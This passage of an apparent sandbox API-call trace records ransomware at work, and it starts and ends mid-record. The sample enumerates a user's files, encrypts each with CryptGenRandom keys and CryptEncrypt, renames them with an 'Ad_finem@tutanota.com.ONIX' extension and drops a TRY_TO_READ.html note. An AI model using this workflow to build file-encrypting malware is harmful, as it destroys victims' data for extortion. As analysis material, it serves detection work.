"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gueejhxr0yfpoaozy_aj.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.205] GetProcessHeap () returned 0x410000 [0129.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.205] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x539ae780, ftCreationTime.dwHighDateTime=0x1d5dc9b, ftLastAccessTime.dwLowDateTime=0xd53853a0, ftLastAccessTime.dwHighDateTime=0x1d5dcfe, ftLastWriteTime.dwLowDateTime=0xd53853a0, ftLastWriteTime.dwHighDateTime=0x1d5dcfe, nFileSizeHigh=0x0, nFileSizeLow=0x102a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gyYga.odt", cAlternateFileName="")) returned 1 [0129.205] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gyyga.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.205] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.205] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x102a, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.205] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.205] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.206] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.206] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.206] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.206] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.206] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt", dwFileAttributes=0x80) returned 1 [0129.215] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt") returned 56 [0129.215] GetProcessHeap () returned 0x410000 [0129.215] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x461440 [0129.215] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt" [0129.215] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.215] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4138) returned 1 [0129.215] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x102a [0129.215] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.215] GetProcessHeap () returned 0x410000 [0129.215] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.215] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.216] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.217] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.218] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102a) returned 0x4e1b68 [0129.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102a) returned 0x4e2ba0 [0129.219] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.219] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x102a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x102a, lpOverlapped=0x0) returned 1 [0129.219] SetFilePointer (in: hFile=0x524, lDistanceToMove=-4138, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.220] WriteFile (in: hFile=0x524, lpBuffer=0x4e2ba0*, nNumberOfBytesToWrite=0x102a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e2ba0*, lpNumberOfBytesWritten=0x367f44c*=0x102a, lpOverlapped=0x0) returned 1 [0129.221] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x102a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.221] CloseHandle (hObject=0x524) returned 1 [0129.221] GetProcessHeap () returned 0x410000 [0129.221] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.221] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gyyga.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyYga.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gyyga.odt.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.224] GetProcessHeap () returned 0x410000 [0129.224] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0129.224] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0129.224] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0129.226] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64481a40, ftCreationTime.dwHighDateTime=0x1d5e15e, ftLastAccessTime.dwLowDateTime=0xa5cc60a0, ftLastAccessTime.dwHighDateTime=0x1d5e629, ftLastWriteTime.dwLowDateTime=0xa5cc60a0, ftLastWriteTime.dwHighDateTime=0x1d5e629, nFileSizeHigh=0x0, nFileSizeLow=0x4065, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdGaCLut.m4a", cAlternateFileName="")) returned 1 [0129.226] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\idgaclut.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.226] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.226] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4065, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.226] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.226] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.227] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.227] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.227] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.227] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.227] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a", dwFileAttributes=0x80) returned 1 [0129.227] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a") returned 59 [0129.227] GetProcessHeap () returned 0x410000 [0129.227] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0129.227] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a" [0129.227] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.227] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16485) returned 1 [0129.228] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4065 [0129.228] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.228] GetProcessHeap () returned 0x410000 [0129.228] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.228] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.228] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.229] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.231] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.232] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4065) returned 0x4e1b68 [0129.232] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4065) returned 0x4e5bd8 [0129.232] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.232] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x4065, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x4065, lpOverlapped=0x0) returned 1 [0129.233] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4065, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.233] CloseHandle (hObject=0x524) returned 1 [0129.234] GetProcessHeap () returned 0x410000 [0129.234] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.234] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\idgaclut.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IdGaCLut.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\idgaclut.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.236] GetProcessHeap () returned 0x410000 [0129.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.236] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2b53e60, ftCreationTime.dwHighDateTime=0x1d5e330, ftLastAccessTime.dwLowDateTime=0xe86e5db0, ftLastAccessTime.dwHighDateTime=0x1d5da7a, ftLastWriteTime.dwLowDateTime=0xe86e5db0, ftLastWriteTime.dwHighDateTime=0x1d5da7a, nFileSizeHigh=0x0, nFileSizeLow=0x1504d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iW4-bP I.avi", cAlternateFileName="IW4-BP~1.AVI")) returned 1 [0129.236] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iw4-bp i.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.236] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.236] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1504d, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.236] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.237] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.237] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.237] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.237] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.237] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.238] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi", dwFileAttributes=0x80) returned 1 [0129.238] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi") returned 59 [0129.238] GetProcessHeap () returned 0x410000 [0129.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0129.238] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi" [0129.238] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.238] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=86093) returned 1 [0129.238] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1504d [0129.238] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.238] GetProcessHeap () returned 0x410000 [0129.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.238] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.238] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.240] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.241] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1504d) returned 0xf70048 [0129.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1504d) returned 0xf850a0 [0129.242] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.242] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x1504d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x1504d, lpOverlapped=0x0) returned 1 [0129.246] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1504d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.246] CloseHandle (hObject=0x524) returned 1 [0129.247] GetProcessHeap () returned 0x410000 [0129.247] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.247] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iw4-bp i.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iW4-bP I.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iw4-bp i.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.251] GetProcessHeap () returned 0x410000 [0129.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.251] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9ec2adf0, ftCreationTime.dwHighDateTime=0x1d5df3f, ftLastAccessTime.dwLowDateTime=0x94d6b090, ftLastAccessTime.dwHighDateTime=0x1d5dcef, ftLastWriteTime.dwLowDateTime=0x94d6b090, ftLastWriteTime.dwHighDateTime=0x1d5dcef, nFileSizeHigh=0x0, nFileSizeLow=0xd221, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jzVD7OtKGP_NsZrv.avi", cAlternateFileName="JZVD7O~1.AVI")) returned 1 [0129.251] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jzvd7otkgp_nszrv.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.251] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.251] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd221, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.251] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.251] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.252] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.252] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.252] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.252] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.252] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi", dwFileAttributes=0x80) returned 1 [0129.253] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi") returned 67 [0129.253] GetProcessHeap () returned 0x410000 [0129.253] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf6) returned 0x431d68 [0129.253] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi" [0129.253] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.253] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=53793) returned 1 [0129.253] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd221 [0129.253] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.253] GetProcessHeap () returned 0x410000 [0129.253] RtlAllocateHeap (HeapHandle=0x410000, 